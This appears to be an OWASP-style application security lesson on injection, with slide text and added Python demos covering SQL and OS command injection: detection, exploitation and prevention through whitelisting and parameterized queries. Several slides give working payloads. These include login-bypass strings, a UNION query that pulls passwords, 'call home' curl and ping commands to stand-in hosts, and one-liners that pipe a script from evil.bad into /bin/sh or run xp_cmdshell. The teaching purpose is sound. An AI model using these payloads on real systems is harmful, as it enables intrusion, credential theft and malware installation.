Injection is the number 1 attack category in the OWASP Top 10 (A1 in both the 2013 and 2017 editions), and for good reason: injection flaws are extremely damaging because they let an attacker execute arbitrary commands, either on the host running the application or on the database server. This Application Security Lesson will teach you what Injection is and which types exist, and explain how to find it, how to exploit it and how to prevent it.
6. Many Types of Injection
• SQL Injection - Ability to insert arbitrary SQL commands in database queries
• NoSQL Injection - Ability to insert arbitrary commands in a NoSQL DB query
• OS Command Injection - Ability to insert arbitrary commands in shell calls
• LDAP Injection - Ability to alter the logic of an LDAP query
• XPath Injection - Ability to alter the logic of an XPath search
• MORE: MX, ORM, OGNL
• RELATED: JSON, XML, HTML?, HTTP HEADER?
14. To sum all it up…
• Injection is the ability to insert arbitrary commands into a string passed to a command processor
• The type of injection takes the name of the affected command processor: SQL, OS Command, LDAP etc.
• SQL and OS Command injection are the most widely exploited
25. To sum all it up…
• Recipe for Injection: hazardous input concatenated into a query or command string
• command + input = injection
• replace(command, placeholder, input) = injection
• format(command, input) = injection
28. A single quote in the name parameter, or a double quote in the file name, leaves the command unbalanced:
SELECT * FROM users WHERE name='''
/bin/sh -c '~/backup.sh test".zip'
30. Blind Injection
• The error is not displayed, or the error message is too generic: "An internal error has occurred"
• You may still observe a difference in the behavior of the application
31. Error vs. No Error
• The application will show an "Internal Error" for an unenclosed quote "
• There will be no error if an enclosing quote is added, two quotes ""
$ /bin/sh -c '~/backup.sh test".zip'
/bin/sh: -c: line 0: unexpected EOF while looking for matching `"'
/bin/sh: -c: line 1: syntax error: unexpected end of file
$ /bin/sh -c '~/backup.sh test"".zip'
yay
32. Tautology
• Influence the logic of a query to be always true or always false, then compare the outcome
SELECT * FROM users WHERE
id = 1           -- returns one record
id = 1 or 1=1    -- returns all records (always true)
id = 1 and 2=1   -- returns no records (always false)
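The detection recipe of the last three slides (error vs. no error, then tautology), as an added Python example that is not part of the deck. It builds its own in-memory SQLite table (constructed sample data), concatenates the payload into the query the way the deck's "command + input" recipe does, and records only what a black-box tester can see: an error or a change in the number of rows. The error text is therefore SQLite's, not the shell or Derby output shown on the slides.

```python
import sqlite3


def build_db():
    """Constructed sample data (not from the deck): three users in memory."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [(1, "admin"), (2, "jdoe"), (3, "obrien")])
    return db


def vulnerable_lookup(db, user_input):
    """The deck's recipe: command + input = injection. user_input is a string
    taken straight from the request and glued onto the query."""
    query = "SELECT * FROM users WHERE id = " + user_input
    return db.execute(query).fetchall()


def probe(db, payload):
    """Send one payload and keep only what a black-box attacker can see:
    whether the request errored, and how many rows came back."""
    try:
        rows = vulnerable_lookup(db, payload)
        return {"error": False, "rows": len(rows)}
    except sqlite3.Error as exc:
        # SQLite reports 'unrecognized token' for a dangling quote; a real
        # application usually hides this behind "An internal error has occurred".
        return {"error": True, "rows": None, "message": str(exc)}


def probe_sequence(db):
    """Error vs. no error, then tautology, in the order the slides describe."""
    return {
        "baseline":     probe(db, "1"),            # one record
        "quote":        probe(db, "1'"),           # unenclosed quote -> error
        "quote_closed": probe(db, "1 and ''=''"),  # balanced quotes -> no error
        "always_true":  probe(db, "1 or 1=1"),     # all records
        "always_false": probe(db, "1 and 2=1"),    # no records
    }


def looks_injectable(results):
    """The signal the deck describes: a lone quote breaks the query, balanced
    quotes do not, and the tautologies move the row count both ways."""
    return (results["quote"]["error"]
            and not results["quote_closed"]["error"]
            and results["always_true"]["rows"] > results["baseline"]["rows"]
            and results["always_false"]["rows"] == 0)


def run_demo():
    db = build_db()
    results = probe_sequence(db)
    return results, looks_injectable(results)


if __name__ == "__main__":
    results, injectable = run_demo()
    for name, outcome in results.items():
        print(f"{name:13} {outcome}")
    print("injectable:", injectable)
```

Against a real target the same four probes are sent over HTTP and "error" becomes "status 500 or the generic error page", while "rows" becomes response length or a count of repeated elements in the page; the decision logic stays the same.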
33. The ET Maneuver
• Especially in the case of OS injection you could add commands that "call home"
• Some examples:
input';ping home.bad -c 1;echo '
input';curl home.bad; echo '
34. Burp Collaborator gives you a home
• The Pro version of Burp creates dynamic host names and reports on the DNS queries and HTTP requests they receive
• Be careful what you send there: anything the payload puts into the request is visible to the Collaborator server
$ /bin/sh -c '~/backup.sh test`curl nofq92nxlhqs01t4rgwz5j84bvhl5a.burpcollaborator.net`.zip'
(curl's progress output follows: % Total, % Received, % Xferd, Average ...)
35. Glass Box
• Access to the application or server logs (you're a developer or tester)
• Tail the log and observe the errors that occur when inserting quotes
Stacktrace:] with root cause
ERROR 42X01: Syntax error: Encountered "'" at line 1, column 49.
    at org.apache.derby.iapi.error.StandardException.newException(Unknown Source)
    at org.apache.derby.iapi.error.StandardException.newException(Unknown Source)
    at org.apache.derby.impl.sql.compile.ParserImpl.parseStatementOrSearchCondition(Unknown Source)
    at org.apache.derby.impl.sql.compile.ParserImpl.parseStatement(Unknown Source)
    at org.apache.derby.impl.sql.GenericStatement.prepMinion(Unknown Source)
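The glass-box check from this slide, as an added Python example that is not part of the deck: a small scanner that reads log lines and flags the messages a command processor emits when an unbalanced quote reaches it. The log lines are constructed here for the example; the Derby and /bin/sh messages are the ones shown on the slides, the PostgreSQL one is added as a further instance of the same class, and the script name and `--stdin` option are assumptions.

```python
import re
import sys

# Constructed sample log lines (not from the deck). They mix normal requests
# with the kind of errors the slides show: a Derby SQL syntax error and a
# /bin/sh quoting error, both caused by an unbalanced quote in input.
SAMPLE_LOG = """\
2024-05-01 10:00:01 INFO  GET /search?q=shoes 200 12ms
2024-05-01 10:00:02 ERROR 42X01: Syntax error: Encountered "'" at line 1, column 49.
2024-05-01 10:00:02 ERROR     at org.apache.derby.impl.sql.compile.ParserImpl.parseStatement(Unknown Source)
2024-05-01 10:00:05 INFO  GET /search?q=boots 200 9ms
2024-05-01 10:00:07 ERROR /bin/sh: -c: line 0: unexpected EOF while looking for matching `"'
2024-05-01 10:00:09 WARN  org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near "'"
"""

# Messages a command processor emits when a quote it did not expect arrives.
INJECTION_SIGNATURES = {
    "derby_syntax_error": re.compile(r"ERROR 42X01: Syntax error"),
    "sh_unterminated_quote": re.compile(r"unexpected EOF while looking for matching"),
    "pg_unterminated_string": re.compile(r"unterminated quoted string"),
}


def scan_lines(lines):
    """Yield (line_number, signature_name, line) for every matching line.
    Works on any iterable of lines, so it can follow a live log on stdin."""
    for number, line in enumerate(lines, 1):
        for name, pattern in INJECTION_SIGNATURES.items():
            if pattern.search(line):
                yield number, name, line.rstrip("\n")
                break


def scan_log(text):
    """Convenience wrapper for a log already held in memory."""
    return list(scan_lines(text.splitlines()))


if __name__ == "__main__":
    # Glass-box use: tail the live log into this script while inserting quotes
    # into the application's parameters (file name and option are assumptions):
    #   tail -f /var/log/app/server.log | python3 quote_errors.py --stdin
    source = sys.stdin if "--stdin" in sys.argv else SAMPLE_LOG.splitlines(True)
    for number, name, line in scan_lines(source):
        print(f"line {number}: {name}: {line}")
```

The stack-trace continuation lines (the `at org.apache.derby...` frames) are deliberately not matched; one hit per error is enough, and the first line of the trace carries the diagnostic. Add signatures for whatever database or shell the application actually uses.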
37. Using Automated Tools
Dynamic Analysis tools
• send numerous payloads intended to influence application behavior and watch for the differences described above
• OWASP ZAP
Static Analysis tools
• follow untrusted input through the application code to the query or command that consumes it (the call graph and data flow) to determine insecure coding
38. To sum all it up…
• Unenclosed quotes break the command/query
• Look for errors
• Look for behavior changes
• Call home
• Look for errors in logs
• Use automated tools such as OWASP ZAP
40. The Magic Credentials
• User names (or passwords) that get you logged into the administrator account:
• admin'--
• admin' or '1'='1
• ' or '1'='1
41. The UNION keyword
In the case of SQL Injection the UNION operator is used to append results from a sensitive table to the impacted query. The appended SELECT must return the same number of columns, with compatible types, as the original one; the constant 1 below pads the articleId column.
SELECT articleId, title, description FROM transactions WHERE userId=15125
UNION SELECT 1, username, password FROM users

articleId  title        description
2          "About Us"   "This is the about page"
3          "Home"       "This is the home page"
1          admin        @dm!n
1          jdoe         p@$$w0rd
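The two exploitation slides above (the magic credentials and the UNION query), as an added Python example that is not part of the deck. The users and transactions tables are constructed in memory to mirror the slide's table (passwords in clear only so that UNION has something to pull out), and the queries are built by string concatenation exactly as the vulnerable application would build them. It also shows a caveat the slide glosses over: because AND binds tighter than OR, `' or '1'='1` in the user name alone still leaves `AND password='...'` to fail; it logs you in when sent in both fields, or with the `admin' or` prefix.

```python
import sqlite3


def build_db():
    """Constructed sample data (not from the deck); rows mirror the slide."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "@dm!n"), (2, "jdoe", "p@$$w0rd")])
    db.execute("CREATE TABLE transactions "
               "(articleId INTEGER, title TEXT, description TEXT, userId INTEGER)")
    db.executemany("INSERT INTO transactions VALUES (?, ?, ?, ?)",
                   [(2, "About Us", "This is the about page", 15125),
                    (3, "Home", "This is the home page", 15125),
                    (4, "Other", "Belongs to another user", 99)])
    return db


def vulnerable_login(db, username, password):
    """String-built login check. Returns the user that 'logged in', or None."""
    query = ("SELECT username FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def vulnerable_articles(db, user_id):
    """String-built version of the slide's query; user_id comes from the request."""
    query = ("SELECT articleId, title, description FROM transactions "
             "WHERE userId=" + user_id)
    return db.execute(query).fetchall()


def magic_credentials(db):
    """The slide's inputs. '--' comments out the password check; the OR forms
    rely on operator precedence (AND before OR), hence the fourth entry."""
    return {
        "admin'--":                    vulnerable_login(db, "admin'--", "wrong"),
        "admin' or '1'='1":            vulnerable_login(db, "admin' or '1'='1", "wrong"),
        "' or '1'='1 (both fields)":   vulnerable_login(db, "' or '1'='1", "' or '1'='1"),
        "' or '1'='1 (username only)": vulnerable_login(db, "' or '1'='1", "wrong"),
    }


def union_exfiltration(db):
    """The slide's UNION payload in place of the numeric userId."""
    payload = "15125 UNION SELECT 1, username, password FROM users"
    return vulnerable_articles(db, payload)


if __name__ == "__main__":
    db = build_db()
    for payload, who in magic_credentials(db).items():
        print(f"{payload:30} -> logged in as {who}")
    for row in union_exfiltration(db):
        print(row)
```

SQLite is used because it ships with Python; MySQL's `--` comment needs a trailing space (`-- `) and `#` also works there, while MS SQL and PostgreSQL accept the bare `--`, so the comment form of the payload may need adjusting per engine.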
42. Deploy Malware
Command Injection, but also SQL Injection, is used to deploy malware and reverse shells. The SQL form below needs a database and driver that accept stacked statements and, on MS SQL, an xp_cmdshell that has been enabled (it is off by default).
• ping host.local`curl http://evil.bad/malware.sh|/bin/sh`
• SELECT * FROM users; EXEC xp_cmdshell 'powershell -command Invoke-RestMethod -Uri http://evil.bad/malware>malware.bat'
43. To sum all it up…
• Injection can be exploited in powerful ways
• Break authentication
• Exfiltrate data
• Install reverse shells and malware
• Full impact on Confidentiality, Integrity and Availability
47. Quotes Not Needed
• The majority of application parameters are not intended to contain quotes
• Many of them are not even intended to contain Unicode characters
• Parameters going into database queries such as ID, true/false, asc/desc have an even smaller character set
Alphanumeric
Alphanumeric + .-_
48. Whitelisting vs. Blacklisting
• Blacklisting can be bypassed
• Encoding attacks
• Forgotten types of quotes
• Injection without quotes
• Remember how many times Shellshock was fixed?
50. Unicode Validation
• One of the common misconceptions about whitelisting: that it breaks multi-language support
• Most programming languages, and regular expression engines with Unicode character classes, will classify other languages' characters correctly as letters:
Character.isLetter("人") == true
Character.isLetter("û") == true
52. A Simple Multi-Purpose Function
isAlphanumOrEx("true")
isAlphanumOrEx("desc")
isAlphanumOrEx("21845816438168")
isAlphanumOrEx("0x0709750fa566")
isAlphanumOrEx("Cr2i7nHq6qiMEs")
isAlphanumOrEx("site.local",'.')
53. The Proper Response to an Injection Attack
• Error conditions can be used to detect injection, but the response below, a rejected request rather than a database or shell error, is what you always want to see in response to hazardous characters:
BAD REQUEST:
INVALID INPUT - MUST BE ALPHANUMERIC
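The whitelist function of slide 52 and the response of slide 53, as an added Python example that is not part of the deck. `is_alphanum_or_ex`, `is_ascii_alnum_or_ex` and `response_for` are hypothetical names chosen here (the deck's own function is the Java-style `isAlphanumOrEx`). It relies on Python's `str.isalnum()` being Unicode-aware, which is the point of the Unicode Validation slide: "人" and "û" pass, quotes never do.

```python
# Hypothetical names (not from the deck): is_alphanum_or_ex mirrors the slide's
# isAlphanumOrEx; response_for models the 400 shown on slide 53.

def is_alphanum_or_ex(value, extra="", max_len=256):
    """Whitelist: every character is a letter or digit in any script, or one of
    the explicitly allowed extra characters. Empty and over-long values fail."""
    if not value or len(value) > max_len:
        return False
    return all(ch.isalnum() or ch in extra for ch in value)


def is_ascii_alnum_or_ex(value, extra="", max_len=256):
    """Tighter variant for parameters such as ID, true/false, asc/desc, where
    characters from other scripts are not expected either."""
    return is_alphanum_or_ex(value, extra, max_len) and value.isascii()


BAD_REQUEST = (400, "BAD REQUEST: INVALID INPUT - MUST BE ALPHANUMERIC")


def response_for(value, extra="", ascii_only=False):
    """Validate one request parameter and return (status, body). A rejected
    value produces only this response: no query or command is ever built from
    it, so there is no syntax error to leak and nothing for a tautology to reach."""
    check = is_ascii_alnum_or_ex if ascii_only else is_alphanum_or_ex
    if not check(value, extra):
        return BAD_REQUEST
    return (200, value)


if __name__ == "__main__":
    # The slide's own inputs, followed by a few hazardous ones.
    for value, extra in [("true", ""), ("desc", ""), ("21845816438168", ""),
                         ("0x0709750fa566", ""), ("Cr2i7nHq6qiMEs", ""),
                         ("site.local", "."), ("人", ""), ("O'Brien", ""),
                         ("' or '1'='1", ""), ('test".zip', ".")]:
        print(f"{value!r:20} extra={extra!r:4} -> {response_for(value, extra)}")
```

Note that `isalnum()` also accepts non-ASCII digits (for example Arabic-Indic digits) and letter-like numerals; where a parameter is meant to be an integer, parse it with `int()` and range-check it rather than passing the validated string through.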
56. How About the Irish?
• Names, comments, articles, free text require quotes:
• O'Brien, don't, "putting things in quotes"
• While input whitelisting reduces the attack surface, it cannot prevent all attacks
66. OWASP ESAPI
• ESAPI - The Enterprise Security API
• Open Source library containing security controls
• Written and tested by application security experts
• Recognized by static analysis tools
67. Using Automated Tools
Intrusion Detection and Prevention (IDS/IPS) / Web Application Firewall (WAF)
• automated blacklisting rules
• can be bypassed
• can alert
Runtime Application Self-Protection (RASP)
• instruments the application
• can detect the exploit and block it
68. To sum all it up…
• Input Whitelisting reduces the attack surface and prevents many attack types
• Parameterized Commands handle situations where hazardous chars are needed
• ORM Frameworks prevent mistakes
• OWASP ESAPI provides a set of handy security functions
• IDS/IPS/WAF/RASP can alert on and prevent some of the attacks but are not a replacement for secure coding
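The "parameterized commands" line of this summary applied to the O'Brien problem of slide 56 and to the deck's backup.sh call, as an added Python example that is not part of the deck. The users table is constructed in memory; the stand-in for `~/backup.sh` is a one-line Python program (an assumption, chosen so the example runs anywhere) that simply reports the file name it was given. The contrast with the concatenated form of the query is kept only to show that the parameterized one takes the same input without breaking.

```python
import sqlite3
import subprocess
import sys


def seeded_db():
    """Constructed sample data (not from the deck): a name that needs a quote."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    # The driver fills the placeholders; O'Brien's quote is data, not syntax.
    db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "O'Brien"), (2, "jdoe")])
    return db


def find_user(db, name):
    """Parameterized lookup: the query text never changes, whatever name holds."""
    return db.execute("SELECT id, name FROM users WHERE name = ?", (name,)).fetchall()


def concatenated_find_breaks(db, name):
    """The deck's hazardous form, kept for contrast: True if the input broke it."""
    try:
        db.execute("SELECT id, name FROM users WHERE name = '" + name + "'").fetchall()
        return False
    except sqlite3.Error:
        return True


def run_backup(filename):
    """OS-command counterpart of a parameterized query: an argv list and no
    shell. Backticks, quotes and semicolons in filename reach the program as
    characters, never as shell syntax. The one-line program stands in for
    ~/backup.sh (an assumption) and echoes the argument it received."""
    argv = [sys.executable, "-c", "import sys; print('backing up', sys.argv[1])",
            filename + ".zip"]
    completed = subprocess.run(argv, capture_output=True, text=True, check=True)
    return completed.stdout.strip()


if __name__ == "__main__":
    db = seeded_db()
    print(find_user(db, "O'Brien"))
    print(find_user(db, "' or '1'='1"))
    print(concatenated_find_breaks(db, "O'Brien"))
    print(run_backup("test`curl home.bad`"))
```

Two caveats worth knowing: argv separation stops shell interpretation but not option injection (a file name beginning with `-` may still be read as a flag by the program, so keep the whitelist in front of it), and when a shell truly cannot be avoided, `shlex.quote()` is the equivalent of a placeholder for POSIX shells.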
69. Test Your Knowledge and get a Badge
• https://owasp.trendmicro.com
• SQL Injection Challenge
• Play code: In' or '1'='1' or 'jection
• Get a participation badge via Badgr.io